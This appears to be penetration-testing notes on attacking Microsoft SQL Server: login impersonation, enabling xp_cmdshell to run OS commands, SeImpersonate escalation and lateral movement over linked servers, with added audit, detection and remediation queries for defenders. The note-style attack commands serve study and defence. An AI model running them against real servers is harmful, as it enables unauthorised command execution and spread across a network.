MS SQL is a Microsoft relational database solution.

Users who lack the public role cannot directly see who else has access to the SQL Server. To enumerate likely SQL Server users from AD group membership with PowerSploit, without holding a role on the instance:

# Enumerate possible SQL Server users
Get-DomainGroup -Identity *SQL* | % { Get-DomainGroupMember -Identity $_.distinguishedname | select groupname, membername }

Besides PowerUpSQL and SQLRecon, impacket's mssqlclient.py can also be used to run SQL statements:

# Password required
mssqlclient.py -windows-auth $DOMAIN/$USER@$SRV_IP

RCE via impersonation

Tags: 09-lateral-movement, 03-execution

See: PowerUpSQL, SQLRecon

Look for logins that may impersonate another (alternatively use SQLRecon):

-- IMPERSONATE grants: grantee_principal_id is the login that may impersonate;
-- major_id (class_desc = 'SERVER_PRINCIPAL') is the login being impersonated.
-- grantor_principal_id records who issued the GRANT and usually matches the target.
SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';
-- Resolve the principal_id values above to names
SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;
-- Impersonate (run REVERT; afterwards to return to the original login)
EXECUTE AS login = '[domain]\[target-user]';
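An added audit query, not from the original notes, that joins the two catalog views above so the IMPERSONATE grants come out as login names rather than ids, and flags targets that are sysadmin members (the case a defender most wants to find). It uses major_id as the impersonated login, which is how sys.server_permissions records server-principal securables.

```sql
-- Added audit query (not from the original notes). For class_desc =
-- 'SERVER_PRINCIPAL' rows, major_id is the login being impersonated.
SELECT
    grantee.name AS can_impersonate,                 -- login holding IMPERSONATE
    target.name  AS target_login,                    -- login that can be impersonated
    target.type_desc,
    target.is_disabled,
    IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin,  -- 1 = direct path to sysadmin
    grantor.name AS granted_by,
    p.state_desc                                     -- GRANT vs GRANT_WITH_GRANT_OPTION
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target  ON target.principal_id  = p.major_id
JOIN sys.server_principals AS grantor ON grantor.principal_id = p.grantor_principal_id
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc = 'SERVER_PRINCIPAL'
ORDER BY target_is_sysadmin DESC, can_impersonate;
```

Run it as sysadmin: metadata visibility rules mean a low-privileged login only sees rows that concern itself. Any row with target_is_sysadmin = 1 is an effective sysadmin grant to the grantee and is normally remediated with REVOKE IMPERSONATE ON LOGIN::[target] FROM [grantee].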

RCE via xp_cmdshell

Tags: 02-initial-access, 03-execution

xp_cmdshell is an MS SQL feature that is disabled by default because it lets SQL users run OS commands. It normally requires sysadmin permissions and executes commands under the SQL Server service account, unless the ##xp_cmdshell_proxy_account## credential is configured, in which case non-sysadmin callers run commands as that proxy account.

PowerUpSQL (sysadmin required; this enables xp_cmdshell, runs the command, then disables it again):

Invoke-SQLOSCmd -Instance "[srv-fqdn],1433" -Command "whoami" -RawResults

Enable and use xp_cmdshell:

-- Check if already enabled (value == 1)
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';
-- Enable if not already
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Run using xp_cmdshell
EXEC xp_cmdshell 'dir';
-- Disable if not originally enabled
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
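An added defender-side example, not from the original notes, that covers the other half of the xp_cmdshell story: auditing the state described above (option on or off, proxy credential present, who is able to flip it, which account commands would run as) and recording every batch that touches xp_cmdshell or sp_configure with an Extended Events session. The session name audit_xp_cmdshell and the output file name are assumptions.

```sql
-- Added defender-side audit (not from the original notes).
-- 1a) Is xp_cmdshell on? value_in_use is the running value, value the pending one.
SELECT name, CONVERT(INT, value) AS configured, CONVERT(INT, value_in_use) AS running
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 1b) Is a proxy account configured? If so, non-sysadmin logins with EXECUTE on
--     xp_cmdshell run commands as that Windows account instead of being refused.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 1c) Who can turn it on? sp_configure needs ALTER SETTINGS, which sysadmin
--     members and CONTROL SERVER holders have implicitly.
SELECT pr.name, pr.type_desc, pe.permission_name AS why
FROM sys.server_principals AS pr
JOIN sys.server_permissions AS pe ON pe.grantee_principal_id = pr.principal_id
WHERE pe.permission_name IN ('ALTER SETTINGS', 'CONTROL SERVER')
UNION ALL
SELECT m.name, m.type_desc, 'sysadmin member'
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name = 'sysadmin';

-- 1d) Which Windows account would an OS command run as (no proxy configured)?
SELECT servicename, service_account
FROM sys.dm_server_services;

-- 2) Detection: capture batches and RPC calls that mention xp_cmdshell or
--    sp_configure, together with the login, client host and application.
CREATE EVENT SESSION [audit_xp_cmdshell] ON SERVER
ADD EVENT sqlserver.sql_batch_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE sqlserver.like_i_sql_unicode_string(batch_text, N'%xp_cmdshell%')
       OR sqlserver.like_i_sql_unicode_string(batch_text, N'%sp_configure%')),
ADD EVENT sqlserver.rpc_completed (
    ACTION (sqlserver.server_principal_name, sqlserver.client_hostname, sqlserver.client_app_name)
    WHERE sqlserver.like_i_sql_unicode_string(statement, N'%xp_cmdshell%'))
ADD TARGET package0.event_file (SET filename = N'audit_xp_cmdshell.xel')  -- assumed path
WITH (STARTUP_STATE = ON);
ALTER EVENT SESSION [audit_xp_cmdshell] ON SERVER STATE = START;
```

The enable/run/disable sequence in the notes above leaves xp_cmdshell looking untouched afterwards, which is why the detection keys on the sp_configure calls as well as on xp_cmdshell itself: a short burst of sp_configure, xp_cmdshell, sp_configure from one login is the pattern to alert on. A sysadmin can of course stop the session, so ship the .xel file off the host.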

Privesc via SeImpersonatePrivilege

Tags: 05-privilege-escalation

See: JuicyPotato and SweetPotato

SQL Server service accounts hold SeImpersonatePrivilege. JuicyPotato (and its variants) coerce a SYSTEM service into authenticating to a listener the attacker controls (the same idea as the print spooler coercion), and the privilege lets the attacker impersonate the resulting SYSTEM token.

Lateral movement via links

Tags: 09-lateral-movement, 02-initial-access

Linked servers ("links") let one SQL Server instance query data on another instance; the remote instance does not need to be in the same domain.

To list links:

SELECT srvname, srvproduct, rpcout FROM master..sysservers;

To run a query through a link:

SELECT * FROM OPENQUERY("[link-srv-fqdn]", 'select @@servername');
SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

xp_cmdshell cannot (normally) be enabled over a link

xp_cmdshell can be used over a link if it is already enabled on the remote instance, but it cannot be enabled through OPENQUERY: sp_configure has to be run with EXEC ... AT, which only works when the link has rpcout enabled.

To enable xp_cmdshell when the link has rpcout=true:

-- square brackets required
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [<link-srv-fqdn>]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [<link-srv-fqdn>]

Automatically enumerate links:

Get-SQLServerLinkCrawl -Instance "[srv-fqdn],1433"
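An added audit query, not from the original notes or PowerUpSQL, that lists the same links as master..sysservers above but from the current catalog views, and pulls out the two properties that decide how much a link is worth for lateral movement: RPC Out (whether EXEC ... AT can reach sp_configure on the remote side) and the login mapping (whether every local login rides a fixed remote credential). The remediation call at the end is commented out and uses a placeholder link name.

```sql
-- Added audit query (not from the original notes).
SELECT s.name                   AS link_name,
       s.data_source,
       s.product,
       s.is_rpc_out_enabled,                      -- 1 = EXEC (...) AT [link] works
       s.is_data_access_enabled,                  -- 1 = OPENQUERY works
       CASE WHEN ll.local_principal_id = 0 THEN '(all logins)'
            ELSE lp.name END    AS local_login,    -- who the mapping applies to
       ll.uses_self_credential,                   -- 1 = caller's own credential passed through
       ll.remote_name                             -- fixed remote login when uses_self_credential = 0
FROM sys.servers AS s
LEFT JOIN sys.linked_logins     AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.is_rpc_out_enabled DESC, s.name;

-- Remediation for a link that does not need remote procedure calls
-- (placeholder link name; run per link after confirming no job depends on it):
-- EXEC sp_serveroption @server = N'[link-srv-fqdn]', @optname = 'rpc out', @optvalue = 'false';
```

A row with local_login = '(all logins)', uses_self_credential = 0 and a remote_name that is sysadmin on the far side means any login on this instance reaches the remote server as that account, and with is_rpc_out_enabled = 1 it can turn on xp_cmdshell there as the notes describe. Those rows are the ones to fix first.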